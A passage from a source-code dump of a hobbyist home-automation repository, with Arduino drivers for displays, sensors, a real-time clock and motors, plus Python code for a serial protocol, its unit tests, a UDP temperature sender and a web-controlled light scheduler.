(i=0; i<4; i++) {\n digitalWrite(d_pins[i], HIGH);\n }\n for (i=0; i<7; i++) {\n digitalWrite(s_pins[i], LOW);\n }\n digitalWrite(dp, LOW);\n}\n\nvoid FourDigitDisplay::_prepare(int value) {\n int d_index;\n if (value < min_value || value > max_value) {\n for (d_index=0; d_index<4; d_index++) {\n d_values[d_index] = DISPLAY_PATTERN_OUT_OF_RANGE;\n }\n return;\n }\n boolean is_minus = (value < 0);\n for (d_index=0; d_index<4; d_index++) {\n d_values[d_index] = 255;\n }\n d_index = 3;\n value = abs(value);\n do {\n d_values[d_index--] = value % 10;\n value /= 10;\n } while (value != 0);\n if (is_minus) {\n d_values[d_index] = 10; // minus sign\n }\n}\n\nvoid FourDigitDisplay::_prepare(double value) {\n int d_index;\n if (value < min_value || value > max_value) {\n for (d_index=0; d_index<4; d_index++) {\n d_values[d_index] = DISPLAY_PATTERN_OUT_OF_RANGE;\n }\n return;\n }\n boolean is_minus = (value < 0);\n for (d_index=0; d_index<4; d_index++) {\n d_values[d_index] = 255;\n }\n d_index = 3;\n long d_value = long(abs(value));\n do {\n d_values[d_index--] = d_value % 10;\n d_value /= 10;\n } while (d_value != 0);\n if (is_minus) {\n d_values[d_index] = 10; // minus sign\n }\n\n d_value = long(abs(value) * 10000);\n for (d_index=3; d_index>-1; d_index--) {\n f_values[d_index] = d_value % 10;\n d_value /= 10;\n }\n}\n\nvoid FourDigitDisplay::display(int value) {\n _prepare(value);\n _display(true);\n}\n\nvoid FourDigitDisplay::display(double value) {\n _prepare(value);\n _display(false);\n}\n\nvoid FourDigitDisplay::display(int value, unsigned long ms) {\n _prepare(value);\n unsigned long ms_prev = millis();\n unsigned long ms_now = ms_prev;\n int i;\n do {\n ms -= ms_now - ms_prev;\n for (i=0; i<1000; i++) {\n _display(true);\n }\n ms_now = millis();\n } while (ms > ms_now - ms_prev);\n}\n\nvoid FourDigitDisplay::display(double value, unsigned long ms) {\n _prepare(value);\n 
unsigned long ms_prev = millis();\n unsigned long ms_now = ms_prev;\n int i;\n do {\n ms -= ms_now - ms_prev;\n for (i=0; i<1000; i++) {\n _display(false);\n }\n ms_now = millis();\n } while (ms > ms_now - ms_prev);\n}\n\n/*\n This function assumes that d_values[] contains the processed digits and the\n minus sign for the integer part, and f_values[] contains the processed\n digits for the fractional part.\n*/\nvoid FourDigitDisplay::_display(boolean only_int) {\n int d_index, i;\n if (only_int) {\n d_index = 4;\n i = 3;\n do {\n clear();\n select_digit(d_index--);\n digit(d_values[i--]);\n } while (i >= 0 && d_values[i] != 255); // guard i so d_values[-1] is never read when all four digits are in use\n } else {\n d_index = 1;\n for (i=0; i<4; i++) {\n if (d_values[i] != 255) {\n clear();\n select_digit(d_index++);\n if (i==3) {\n digit(d_values[i], true);\n } else {\n digit(d_values[i]);\n }\n }\n }\n i = 0;\n while (d_index < 5) {\n clear();\n select_digit(d_index++);\n digit(f_values[i++]);\n }\n }\n clear();\n}\n\n"
},
{
"alpha_fraction": 0.6490118503570557,
"alphanum_fraction": 0.6600790619850159,
"avg_line_length": 19.704917907714844,
"blob_id": "687dc0ca35398e721827ff4364114376cc06c9fe",
"content_id": "78bbef6e3a41f79845feaaaf671e38fc0fbf256f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1265,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 61,
"path": "/WifiCar/UltraSoundDistanceMeas.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Copyright (C) 2014 Michael Duo Ling <[email protected]>\n\n This program is free software; you can redistribute it and/or\n modify it under the terms of the GNU General Public License\n version 2 as published by the Free Software Foundation.\n */\n\n/**\n * @file UltraSoundDistanceMeas.h\n *\n * Class declaration for UltraSoundDistanceMeas\n */\n\n#ifndef __UltraSoundDistanceMeas_H__\n#define __UltraSoundDistanceMeas_H__\n\n#include <Arduino.h>\n\n// speed of ultra sound: 340 m/s = 340 um/us\n#define ULTRASOUND_SPEED 340\n\nclass UltraSoundDistanceMeas\n{\nprivate:\n unsigned int trig_pin;\n unsigned int echo_pin;\n\npublic:\n\n /**\n * @name Primary public interface\n *\n * These are the main methods you need to operate the chip\n */\n /**@{*/\n\n /**\n * Constructor\n *\n * Creates a new instance of this driver. Before using, create\n * an instance and send in the unique pins that this chip is\n * connected to.\n *\n * @param trig_pin The pin attached to Trig\n * @param echo_pin The pin attached to Echo\n */\n UltraSoundDistanceMeas(unsigned int _trig_pin, unsigned int _echo_pin);\n\n /**\n * Turn light on with given color.\n */\n unsigned long measure(void);\n\n void init(void);\n\n /**@}*/\n\n};\n\n#endif // __UltraSoundDistanceMeas_H__\n\n\n"
},
{
"alpha_fraction": 0.47085610032081604,
"alphanum_fraction": 0.5368852615356445,
"avg_line_length": 26.11111068725586,
"blob_id": "c08c34a752eceb489953eb06dca520d60cca41f7",
"content_id": "8a774d51c49275da725ce633c321c4c36e875739",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2196,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 81,
"path": "/MiniTempSensor/MiniTempSensor.ino",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Copyright (C) 2014 Michael Duo Ling <[email protected]>\n\n This program is free software; you can redistribute it and/or\n modify it under the terms of the GNU General Public License\n version 2 as published by the Free Software Foundation.\n\n Connection:\n # DS18B20 <-> Pro Mini\n GND -> GND\n VCC -> 5V\n DATA -> 4.7 kOhm -> 5V\n DATA -> PIN_D2\n\n # 4-digit 7-segment display <-> Pro Mini\n digit_1 <- PIN_12 <-> PIN_D0\n digit_2 <- PIN_1 <-> PIN_D1\n digit_3 <- PIN_5 <-> PIN_D12\n digit_4 <- PIN_9 <-> PIN_D13\n segment_A <- PIN_14 <-> PIN_D4\n segment_B <- PIN_8 <-> PIN_D5\n segment_C <- PIN_6 <-> PIN_D6\n segment_D <- PIN_2,7 <-> PIN_D7\n segment_E <- PIN_4 <-> PIN_D8\n segment_F <- PIN_13 <-> PIN_D9\n segment_G <- PIN_10 <-> PIN_D10\n decimal_point <- PIN_3 <-> PIN_D11\n\nObservations:\n 1. the reading from DS18B20 seems to be drifting quite much ~2 degrees after boot up;\n 2. the reading from DS18B20 seems to drift slightly after the initial big drift stops;\n\nTODO:\n 1. Attach a F2481AH 4-digits 7-segment display;\n*/\n\n#include <Arduino.h>\n#include \"TemperatureSensor.h\"\n#include \"FourDigitDisplay.h\"\n\nconst unsigned long UPDATE_INTERVAL_MS = 60000; // update every 60 seconds\n\n//#define ENABLE_DEBUG\n\nOneWire ds(2);\nFourDigitDisplay fdd(0, 1, 12, 13, 4, 5, 6, 7, 8, 9, 10, 11);\n\nvoid setup() {\n Serial.end();\n fdd.init();\n}\n\n#ifdef ENABLE_DEBUG\n int test_values[9] = {-999, -87, -6, 0, 12, 345, 6789, 9999, 0};\n#endif\n\nvoid loop() {\n int i;\n float temperature = get_temperature(&ds);\n int int_temp = int(temperature);\n #ifdef ENABLE_DEBUG\n //Serial.println(temperature);\n int j;\n /*\n delay(500);\n for (i=1; i<5; i++) {\n fdd.select_digit(i);\n for (j=0; j<10; j++) {\n fdd.digit(j);\n delay(100);\n }\n }*/\n delay(500);\n fdd.display(1.23, 2000);/*\n for (i=0; i<1000; i++) {\n fdd.display(45);\n }*/\n #else\n fdd.display(temperature, UPDATE_INTERVAL_MS);\n #endif\n}\n"
},
{
"alpha_fraction": 0.5611672401428223,
"alphanum_fraction": 0.5978301763534546,
"avg_line_length": 27.12631607055664,
"blob_id": "b4009a7c0e55c814005bb2f6fd6cfaf8dc7922bc",
"content_id": "b81deb08a485244c34c3d633f30f65fe67a699b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2673,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 95,
"path": "/LcdDisplay/DS3231.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "\n#include \"DS3231.h\"\n\n\nDS3231::DS3231(int _i2c_addr):\n i2c_addr(_i2c_addr)\n{\n}\n\nvoid DS3231::begin() {\n Wire.begin();\n}\n\n// Convert normal decimal numbers to binary coded decimal\nbyte DS3231::decToBcd(byte val)\n{\n return( (val/10*16) + (val%10) );\n}\n\n// Convert binary coded decimal to normal decimal numbers\nbyte DS3231::bcdToDec(byte val)\n{\n return( (val/16*10) + (val%16) );\n}\n\nvoid DS3231::setTime(byte second, byte minute, byte hour, byte dayOfWeek,\n byte dayOfMonth, byte month, byte year)\n{\n // sets time and date data to DS3231\n Wire.beginTransmission(i2c_addr);\n Wire.write(0); // set next input to start at the seconds register\n Wire.write(decToBcd(second)); // set seconds\n Wire.write(decToBcd(minute)); // set minutes\n Wire.write(decToBcd(hour)); // set hours\n Wire.write(decToBcd(dayOfWeek)); // set day of week (1=Sunday, 7=Saturday)\n Wire.write(decToBcd(dayOfMonth)); // set date (1 to 31)\n Wire.write(decToBcd(month)); // set month\n Wire.write(decToBcd(year)); // set year (0 to 99)\n Wire.endTransmission();\n}\n\nvoid DS3231::_readTime()\n{\n Wire.beginTransmission(i2c_addr);\n Wire.write(0); // set DS3231 register pointer to 00h\n Wire.endTransmission();\n Wire.requestFrom(i2c_addr, 7);\n // request seven bytes of data from DS3231 starting from register 00h\n second = bcdToDec(Wire.read() & 0x7f);\n minute = bcdToDec(Wire.read());\n hour = bcdToDec(Wire.read() & 0x3f);\n dayOfWeek = bcdToDec(Wire.read());\n dayOfMonth = bcdToDec(Wire.read());\n month = bcdToDec(Wire.read());\n year = bcdToDec(Wire.read());\n}\n\nString DS3231::readTime()\n{\n _readTime();\n String s_time = String(\"\") + hour + \":\";\n //Serial.print(hour, DEC); Serial.print(\":\");\n if (minute < 10) {\n s_time += \"0\";\n }\n s_time += minute;\n //Serial.print(minute, DEC); Serial.print(\":\");\n s_time += \":\";\n if (second < 10) {\n s_time += \"0\";\n }\n s_time += second;\n //Serial.print(second, DEC); Serial.print(\" \");\n s_time += \" \";\n s_time += dayOfMonth;\n //Serial.print(dayOfMonth, DEC); Serial.print(\"/\");\n s_time += \"/\";\n s_time += month;\n //Serial.print(month, DEC); Serial.print(\"/\");\n s_time += \"/\";\n s_time += year;\n //Serial.print(month, DEC); Serial.print(\" \");\n s_time += \" \";\n switch (dayOfWeek) {\n case 1: s_time += \"Sun\"; break;\n case 2: s_time += \"Mon\"; break;\n case 3: s_time += \"Tue\"; break;\n case 4: s_time += \"Wed\"; break;\n case 5: s_time += \"Thu\"; break;\n case 6: s_time += \"Fri\"; break;\n case 7: s_time += \"Sat\"; break;\n default: break;\n }\n //Serial.println(dayOfWeek);\n return s_time;\n}\n"
},
{
"alpha_fraction": 0.6453900933265686,
"alphanum_fraction": 0.6897163391113281,
"avg_line_length": 30.33333396911621,
"blob_id": "c30258667558f8cb91fb7eea980555a57e87ddd2",
"content_id": "f648432e823c9eac0d7e0d40bddb8c3d71b563a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 564,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 18,
"path": "/lib/PyUdpServer/PyUdpClient.py",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\nimport socket\nimport sys\n\nHOST, PORT = \"192.168.31.107\", 9999\n# data = \" \".join(sys.argv[1:])\ndata = \"kitchen;temperature;-100\"\n\n# SOCK_DGRAM is the socket type to use for UDP sockets\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n# As you can see, there is no connect() call; UDP has no connections.\n# Instead, data is directly sent to the recipient via sendto().\nsock.sendto(bytes(data, \"ascii\"), (HOST, PORT))\n#received = str(sock.recv(1024), \"utf-8\")\n\nprint(\"Sent: {}\".format(data))\n#print(\"Received: {}\".format(received))\n"
},
{
"alpha_fraction": 0.6804733872413635,
"alphanum_fraction": 0.7396449446678162,
"avg_line_length": 41.25,
"blob_id": "c42fad1fb664aefdaca7710d78da457696473553",
"content_id": "c81a5a71227ffda0d8f37dcdc22945bd58391a80",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 169,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 4,
"path": "/pysmarthouse.sh",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n# control kitchen window light on GPIO #10\npython3 /home/pi/git/pysmarthouse/GpioOnSunSchedule/GpioOnSunSchedule.py -c \"Stockholm\" -p 10 -s 1 -d 1 -i 300 &\n"
},
{
"alpha_fraction": 0.6117277145385742,
"alphanum_fraction": 0.6150573492050171,
"avg_line_length": 33.21519088745117,
"blob_id": "7289bb1e600195862a6bc73eb46c0945bb0eb06d",
"content_id": "db513a4398f9e1c3ccb07312a3b936de556ba419",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5406,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 158,
"path": "/WifiCar/SerialProtocol/protocol.py",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "import logging\n\ndef segment(a_str, end_mark=';', seperator=':'):\n '''\n Segment a string to a tuple, for later analysis.\n '''\n logging.getLogger(__name__).debug('segment({}, {}, {}'.format(a_str, end_mark, seperator))\n result = tuple(a_str.split(end_mark)[0].split(seperator))\n logging.getLogger(__name__).debug('segment() = {}'.format(result))\n return result\n\ndef is_response(segment_list):\n if segment_list[0] == 'RSP':\n return True\n else:\n return False\n\ndef is_ok_response(segment_list):\n if is_response(segment_list):\n if segment_list[1] == 'OK':\n return True\n return False\n\ndef temperature(segment_list):\n return float(segment_list[2])\n\nclass NotPduException(Exception):\n pass\nclass EmptyPduException(Exception):\n pass\n\nclass Pdu:\n END_MARK, SEPARATOR = ';', ':'\n\nclass RxPdu(Pdu):\n MINIMUM_LENGTH = 2\n def __init__(self, a_str):\n if not isinstance(a_str, str):\n raise NotPduException(\"type({}) is {}, not a string\".format(a_str, type(a_str)))\n seg_list = a_str.split(Pdu.END_MARK)\n if len(seg_list) < 1:\n raise EmptyPduException(\"{} is too short to be an RxPdu\".format(seg_list))\n seg_list = seg_list[0]\n if len(seg_list) == 0: # empty string\n raise EmptyPduException(\"{} is too short to be an RxPdu\".format(seg_list))\n seg_list = seg_list.split(Pdu.SEPARATOR)\n if len(seg_list) < RxPdu.MINIMUM_LENGTH:\n raise EmptyPduException(\"{} is too short to be an RxPdu\".format(seg_list))\n self.type = seg_list[0]\n self.specific_fields = tuple(seg_list[1:])\n\n\nclass NotResponseException(Exception):\n pass\nclass IllegalStatusResponseException(Exception):\n pass\nclass MissingParameterResponseException(Exception):\n pass\nclass IllegalParameterResponseException(Exception):\n pass\n\nclass Response(RxPdu):\n OK, NOK, NOT_SUPPORTED, UNKNOWN = ('OK', 'NOK', 'NOT_SUPPORTED', 'UNKNOWN')\n TYPE = 'RSP'\n def __init__(self, a_str):\n super().__init__(a_str)\n if self.type != Response.TYPE:\n raise NotResponseException(\"type = {} is not a response\".format(self.type))\n self.status = Response.UNKNOWN\n status = self.specific_fields[0]\n if status == Response.OK:\n self.status = Response.OK\n elif status == Response.NOK:\n self.status = Response.NOK\n elif status == Response.NOT_SUPPORTED:\n self.status = Response.NOT_SUPPORTED\n else:\n raise IllegalStatusResponseException(\"status = {} is illegal\".format(status))\n self.parameters = tuple(self.specific_fields[1:])\n\nclass NotRxCmdException(Exception):\n pass\nclass RxCmd(RxPdu):\n EMPTY_CMD, NOK, NOT_SUPPORTED, UNKNOWN = ('', 'NOK', 'NOT_SUPPORTED', 'UNKNOWN')\n TYPE = 'CMD'\n def __init__(self, a_str):\n super().__init__(a_str)\n if self.type != RxCmd.TYPE:\n raise NotRxCmdException(\"type = {} is not a RxCmd\".format(self.type))\n self.cmd = RxCmd.EMPTY_CMD\n if len(self.specific_fields) > 0:\n self.cmd = self.specific_fields[0]\n\nclass TemperatureResponse(Response):\n def __init__(self, a_str):\n super().__init__(a_str)\n if len(self.parameters) == 0:\n raise MissingParameterResponseException()\n try:\n self.value = float(self.parameters[0])\n except ValueError:\n raise IllegalParameterResponseException(\"parameter = {} is illegal for a {}\".format(self.parameters[0], self.__class__))\n\nclass TxPdu(Pdu):\n MINIMUM_LENGTH = 2\n def __init__(self, pdu_type, specific_fields):\n assert isinstance(pdu_type, str)\n assert isinstance(specific_fields, tuple) or isinstance(specific_fields, list)\n self.type = pdu_type\n self.specific_fields = specific_fields\n def __str__(self):\n return self.__repr__()\n def 
__repr__(self):\n specific_fields = Pdu.SEPARATOR.join(self.specific_fields)\n return Pdu.END_MARK.join((Pdu.SEPARATOR.join((self.type, specific_fields)),'\\n'))\n\nclass Command(TxPdu):\n TYPE = 'CMD'\n def __init__(self, specific_fields):\n super().__init__(Command.TYPE, specific_fields)\n\nclass TemperatureCommand(Command):\n CMD = 'TEMPER'\n def __init__(self):\n super().__init__((TemperatureCommand.CMD,))\n\nclass MotorForwardCommand(Command):\n def __init__(self):\n super().__init__((\"FORWARD\",))\nclass MotorBackwardCommand(Command):\n def __init__(self):\n super().__init__((\"BACKWARD\",))\nclass MotorStopCommand(Command):\n def __init__(self):\n super().__init__((\"STOP\",))\nclass MotorSpeedUpCommand(Command):\n def __init__(self):\n super().__init__((\"SPEEDUP\",))\nclass MotorSpeedDownCommand(Command):\n def __init__(self):\n super().__init__((\"SPEEDDOWN\",))\nclass MotorTurnLeftCommand(Command):\n def __init__(self):\n super().__init__((\"TURNLEFT\",))\nclass MotorTurnRightCommand(Command):\n def __init__(self):\n super().__init__((\"TURNRIGHT\",))\n\nclass NotDebugMsgException(Exception):\n pass\n\nclass DebugMsg(RxPdu):\n TYPE = 'DEB'\n def __init__(self, a_str):\n super().__init__(a_str)\n if self.type != DebugMsg.TYPE:\n raise NotDebugMsgException(\"type = {} is not a debug message\".format(self.type))\n self.msg = Pdu.SEPARATOR.join(self.specific_fields)\n"
},
{
"alpha_fraction": 0.5828717350959778,
"alphanum_fraction": 0.6242011189460754,
"avg_line_length": 35.65625,
"blob_id": "911b54cec81fc872110dab29fc738b38a18e47a1",
"content_id": "9aec76eafb809b175210aa41f3aec2ea9bbcf1e7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2347,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 64,
"path": "/WebInterface/python/script.py",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "import webiopi\nimport datetime\nimport pygal\nimport db\n\nGPIO = webiopi.GPIO\n\nLIGHT = 17 # GPIO pin using BCM numbering\n\nHOUR_ON = 8 # Turn Light ON at 08:00\nHOUR_OFF = 18 # Turn Light OFF at 18:00\n\n# setup function is automatically called at WebIOPi startup\ndef setup():\n database = db.DB()\n for i in range(10):\n database.insert(db.ALL_IDS[0], db.ALL_TYPES[0], float(i*2+1), datetime.datetime.now()+datetime.timedelta(seconds=i))\n temperatures = list()\n for id, t, v, ts in database.get_records():\n temperatures.append( (ts, v), )\n #print(\"{:16s}{:16s}{:8.2f}\\t{:10s}\".format(id, t, v, str(ts)))\n print(temperatures)\n datey = pygal.DateY(x_label_rotation=20, range=(0, 25), explicit_size=True, width=500, height=400)\n datey.add(db.ALL_TYPES[0], temperatures)\n #datey.add(\"Visits\", [\n # (datetime.datetime(2013, 1, 2), 300),\n # (datetime.datetime(2013, 1, 12), 412),\n # (datetime.datetime(2013, 2, 2), 823),\n # (datetime.datetime(2013, 2, 22), 672)])\n datey.render_to_file('bar_chart.svg')\n # bar_chart = pygal.Bar() # Then create a bar graph object\n # bar_chart.add('Fibonacci', [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55]) # Add some values\n # bar_chart.render_to_file('bar_chart.svg')\n # set the GPIO used by the light to output\n GPIO.setFunction(LIGHT, GPIO.OUT)\n\n # retrieve current datetime\n now = datetime.datetime.now()\n\n # test if we are between ON time and tun the light ON\n if ((now.hour >= HOUR_ON) and (now.hour < HOUR_OFF)):\n GPIO.digitalWrite(LIGHT, GPIO.HIGH)\n\n# loop function is repeatedly called by WebIOPi \ndef loop():\n # retrieve current datetime\n now = datetime.datetime.now()\n\n # toggle light ON all days at the correct time\n if ((now.hour == HOUR_ON) and (now.minute == 0) and (now.second == 0)):\n if (GPIO.digitalRead(LIGHT) == GPIO.LOW):\n GPIO.digitalWrite(LIGHT, GPIO.HIGH)\n\n # toggle light OFF\n if ((now.hour == HOUR_OFF) and (now.minute == 0) and (now.second == 0)):\n if (GPIO.digitalRead(LIGHT) == GPIO.HIGH):\n GPIO.digitalWrite(LIGHT, GPIO.LOW)\n\n # gives CPU some time before looping again\n webiopi.sleep(1)\n\n# destroy function is called at WebIOPi shutdown\ndef destroy():\n GPIO.digitalWrite(LIGHT, GPIO.LOW)\n\n"
},
{
"alpha_fraction": 0.5319284796714783,
"alphanum_fraction": 0.6085568070411682,
"avg_line_length": 25.116666793823242,
"blob_id": "767ff12e7c834a4e252b68feeaec155f77840418",
"content_id": "a8c588537d2f1ee3f1ac960f800c678b16bb11c3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1566,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 60,
"path": "/ArduinoController/bitlashDS18B20.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Provide bitlash wrap-up of a DS18B20 instance.\n DS18B20 instance has to be:\n 1. named \"ds18b20\";\n 2. exist as global variale\n*/\n\n// Note that bitlash requires return value to be of type \"numvar\", which is equivalent to \"signed long\" in Arduino.\n// So the temperature returned here is in unit of 0.001 Degree Celsius.\nnumvar ds18b20_get_temp(void)\n{\n //returns the temperature from one DS18S20 in DEG Celsius\n\n byte data[12];\n byte addr[8];\n\n if ( !ds18b20.search(addr)) {\n //no more sensors on chain, reset search\n ds18b20.reset_search();\n return -1000;\n }\n\n if ( OneWire::crc8( addr, 7) != addr[7]) {\n /* Serial.println(\"CRC is not valid!\"); */\n return -1000;\n }\n\n if ( addr[0] != 0x10 && addr[0] != 0x28) {\n /* Serial.print(\"Device is not recognized\"); */\n return -1000;\n }\n\n ds18b20.reset();\n ds18b20.select(addr);\n ds18b20.write(0x44,1); // start conversion, with parasite power on at the end\n\n byte present = ds18b20.reset();\n ds18b20.select(addr); \n ds18b20.write(0xBE); // Read Scratchpad\n\n\n for (int i = 0; i < 9; i++) { // we need 9 bytes\n data[i] = ds18b20.read();\n }\n\n ds18b20.reset_search();\n\n byte MSB = data[1];\n byte LSB = data[0];\n\n float tempRead = ((MSB << 8) | LSB); //using two's compliment\n float TemperatureSum = tempRead / 16;\n\n return (numvar)(TemperatureSum * 100);\n}\n\nvoid register_bitlash_ds18b20(void)\n{\n addBitlashFunction(\"ds18b20_get_temp\", (bitlash_function) ds18b20_get_temp);\n}"
},
{
"alpha_fraction": 0.4071294665336609,
"alphanum_fraction": 0.4183864891529083,
"avg_line_length": 18.035715103149414,
"blob_id": "8f3c74d4faa3c6994d63c9232fc2a0e1270ab120",
"content_id": "92eec1167f8c9f981ecc5b684ed22fa1c88df6dc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 533,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 28,
"path": "/ArduinoController/Cmd.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n*/\n#include \"Cmd.h\"\n#ifdef USE_RELAY\n #include \"Relay.h\"\n extern Relay relay;\n#endif\n\n/****************************************************************************/\nCmd::Cmd(String __cmdS):\n _cmdS(__cmdS)\n{\n}\n\nvoid Cmd::execute(void)\n{\n for (int i=0;i<_cmdS.length();i++) {\n switch (_cmdS.charAt(i)) {\n #ifdef USE_RELAY\n case '0': relay.on(); break;\n case '1': relay.off(); break;\n #endif\n case 'd': delay(500); break;\n default:\n continue;\n }\n }\n}\n"
},
{
"alpha_fraction": 0.563018262386322,
"alphanum_fraction": 0.5829187631607056,
"avg_line_length": 33.485713958740234,
"blob_id": "575a50395ab85ee423cf27748cc01bd7bcc2506b",
"content_id": "4da536d136f9a066f36659dddabb1abc35921f3f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1206,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 35,
"path": "/WifiCar/SerialProtocol/tests/testProtocol.py",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom ..protocol import RxPdu, Response, TemperatureResponse, TxPdu, Command, TemperatureCommand\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG)\n\nclass TestProtocol(unittest.TestCase):\n def test_RxPdu(self):\n a_str = 'RSP:OK:37.4;\\n'\n pdu = RxPdu(a_str)\n assert pdu.type == 'RSP'\n assert pdu.specific_fields == ('OK', '37.4')\n def test_Response(self):\n a_str = 'RSP:OK:37.4;\\n'\n response = Response(a_str)\n assert response.status == 'OK'\n assert response.parameters == ('37.4',)\n def test_TemperatureResponse(self):\n a_str = 'RSP:OK:37.4;\\n'\n t = TemperatureResponse(a_str)\n assert abs(t.value - 37.4) < 0.00001\n\n def test_TxPdU(self):\n p = TxPdu(pdu_type='CMD', specific_fields=('TEMPER',))\n assert str(p) == 'CMD:TEMPER;\\n'\n p = TxPdu('CMD', ())\n assert str(p) == 'CMD:;\\n'\n def test_Command(self):\n p = Command(specific_fields=('TEMPER',))\n assert str(p) == 'CMD:TEMPER;\\n'\n p = Command(())\n assert str(p) == 'CMD:;\\n'\n def test_TemperatureCommand(self):\n p = TemperatureCommand()\n assert str(p) == 'CMD:TEMPER;\\n'"
},
{
"alpha_fraction": 0.6021791100502014,
"alphanum_fraction": 0.6128089427947998,
"avg_line_length": 27.725191116333008,
"blob_id": "1a69a17a8ca13f848988d08c3579ca61cbc200b3",
"content_id": "59326542422e87e824889d4091c78055cf9d87fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3763,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 131,
"path": "/WifiCar/Motor.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n*/\n#include \"Motor.h\"\n\n/****************************************************************************/\n\nMotor::Motor(int _enA, int _in1, int _in2, int _enB, int _in3, int _in4):\n enA(_enA), in1(_in1), in2(_in2), enB(_enB), in3(_in3), in4(_in4)\n{\n status = MOTOR_STATUS_STOP;\n long_execution_timer = MOTOR_LONG_EXECUTION_TIMER;\n short_execution_timer = MOTOR_SHORT_EXECUTION_TIMER;\n speed = MOTOR_LOWEST_SPEED;\n}\n\nvoid Motor::init() {\n last_update = millis();\n}\n\nvoid Motor::idle() {\n unsigned long now = millis();\n long_execution_timer -= now - last_update;\n if (long_execution_timer < 0) {\n long_execution_timer = 0;\n }\n short_execution_timer -= now - last_update;\n if (short_execution_timer < 0) {\n short_execution_timer = 0;\n }\n if (long_execution_timer == 0) {\n stop();\n status = MOTOR_STATUS_STOP;\n } else if (short_execution_timer == 0) {\n if (status == MOTOR_STATUS_LEFT || status == MOTOR_STATUS_RIGHT) {\n forward();\n status = MOTOR_STATUS_FORWARD;\n }\n }\n}\n\nvoid Motor::execute(int op_code) {\n switch (op_code) {\n case OP_CODE_MOTOR_FORWARD: forward(); break;\n case OP_CODE_MOTOR_BACKWARD: backward(); break;\n case OP_CODE_MOTOR_STOP: stop(); break;\n case OP_CODE_MOTOR_SPEEDUP: speedup(); break;\n case OP_CODE_MOTOR_SPEEDDOWN: speeddown(); break;\n case OP_CODE_MOTOR_TURNLEFT: turnleft(); break;\n case OP_CODE_MOTOR_TURNRIGHT: turnright(); break;\n default: ;\n }\n}\n\nvoid Motor::forward() {\n digitalWrite(in1, HIGH);\n digitalWrite(in2, LOW);\n digitalWrite(in3, HIGH);\n digitalWrite(in4, LOW);\n analogWrite(enA, speed);\n analogWrite(enB, speed);\n status = MOTOR_STATUS_FORWARD;\n long_execution_timer = MOTOR_LONG_EXECUTION_TIMER;\n}\n\nvoid Motor::backward() {\n digitalWrite(in1, LOW);\n digitalWrite(in2, HIGH);\n digitalWrite(in3, LOW);\n digitalWrite(in4, HIGH);\n analogWrite(enA, speed);\n analogWrite(enB, speed);\n status = MOTOR_STATUS_BACKWARD;\n long_execution_timer = MOTOR_LONG_EXECUTION_TIMER;\n}\n\nvoid Motor::turnleft() {\n digitalWrite(in1, HIGH);\n digitalWrite(in2, LOW);\n digitalWrite(in3, LOW);\n digitalWrite(in4, HIGH);\n analogWrite(enA, speed);\n analogWrite(enB, speed);\n status = MOTOR_STATUS_LEFT;\n long_execution_timer = MOTOR_LONG_EXECUTION_TIMER;\n short_execution_timer = MOTOR_SHORT_EXECUTION_TIMER;\n}\n\nvoid Motor::turnright() {\n digitalWrite(in1, LOW);\n digitalWrite(in2, HIGH);\n digitalWrite(in3, HIGH);\n digitalWrite(in4, LOW);\n analogWrite(enA, speed);\n analogWrite(enB, speed);\n status = MOTOR_STATUS_RIGHT;\n long_execution_timer = MOTOR_LONG_EXECUTION_TIMER;\n short_execution_timer = MOTOR_SHORT_EXECUTION_TIMER;\n}\n\nvoid Motor::stop() {\n digitalWrite(in1, LOW);\n digitalWrite(in2, LOW);\n digitalWrite(in3, LOW);\n digitalWrite(in4, LOW);\n analogWrite(enA, 0);\n analogWrite(enB, 0);\n status = MOTOR_STATUS_STOP;\n long_execution_timer = MOTOR_LONG_EXECUTION_TIMER;\n}\n\nvoid Motor::speedup() {\n speed += 